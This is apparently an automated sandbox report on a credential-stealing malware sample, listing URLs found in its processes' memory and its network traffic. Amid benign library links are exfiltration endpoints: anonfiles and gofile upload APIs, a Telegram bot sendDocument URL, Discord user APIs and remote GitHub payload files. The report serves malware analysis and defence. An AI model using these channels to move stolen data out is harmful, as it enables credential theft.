                                  Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: based.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                  Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                  Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                  Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                  Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                  Source: based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                                  Source: powershell.exe, 00000013.00000002.2061867886.0000022E6DDC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                                  Source: based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                  Source: powershell.exe, 00000013.00000002.1988409193.0000022E557B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                                  Source: based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://api.telegram.org/file/bot
                                  Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                                  Source: based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                                  Source: based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                                  Source: based.exe, 00000008.00000003.1893065874.000001EB8717D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892158606.000001EB8717A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892458033.000001EB87F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                                  Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                  Source: TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874E048000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86AC8000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899911021.000001BF9992C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                  Source: hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                  Source: TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                  Source: based.exe, 00000008.00000002.2123124196.000001EB871E2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87804000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1905635031.000001EB87863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                                  Source: TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                  Source: based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                                  Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125974666.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120360311.000001EB8753C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124224043.000001EB87540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                  Source: based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                  Source: based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/29207
                                  Source: based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                  Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                  Source: based.exe, 00000008.00000003.2121207876.000001EB871FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                  Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                                  Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                  Source: based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                  Source: based.exe, 00000008.00000003.1899424084.000001EB87177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                  Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: based.exe, 00000008.00000003.1889915648.000001EB86F1A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1889699362.000001EB86EE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123009852.000001EB86F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                                  Source: TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                                  Source: hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                                  Source: main.exe, 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-
                                  Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png
                                  Source: based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz
                                  Source: main.exe, 00000015.00000002.1999999146.0000025EB7D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com~?0i
                                  Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: svchost.exe, 00000020.00000002.2494944873.0000023340566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semver.org/
                                  Source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://system.data.sqlite.org/
                                  Source: based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                  Source: based.exe, 00000008.00000003.2121494998.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                  Source: based.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                                  Source: based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                                  Source: svchost.exe, 00000016.00000003.1950071830.000002C3F582E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                                  Source: based.exe, 00000007.00000003.1876475016.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2131676898.00007FFDFAC30000.00000004.00000001.01000000.0000001C.sdmp, based.exe, 00000008.00000002.2138193378.00007FFE00828000.00000004.00000001.01000000.0000001D.sdmp, svchost.exe, 00000016.00000003.1957532160.000002C3F582E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                                  Source: hacn.exe, 00000006.00000003.1869625462.0000024C988B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                                  Source: TS-240605-Millenium1.exe, 00000002.00000003.1839123127.000002874E458000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874DFC0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86A40000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1901068815.000001BF9A1E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                  Source: TS-240605-Millenium1.exe, TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB200000.00000040.00000001.01000000.00000005.sdmp, based.exe, based.exe, 00000008.00000002.2132559008.00007FFDFB200000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.python.org/psf/license/
                                  Source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2054080232.00007FFDF5458000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                  Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
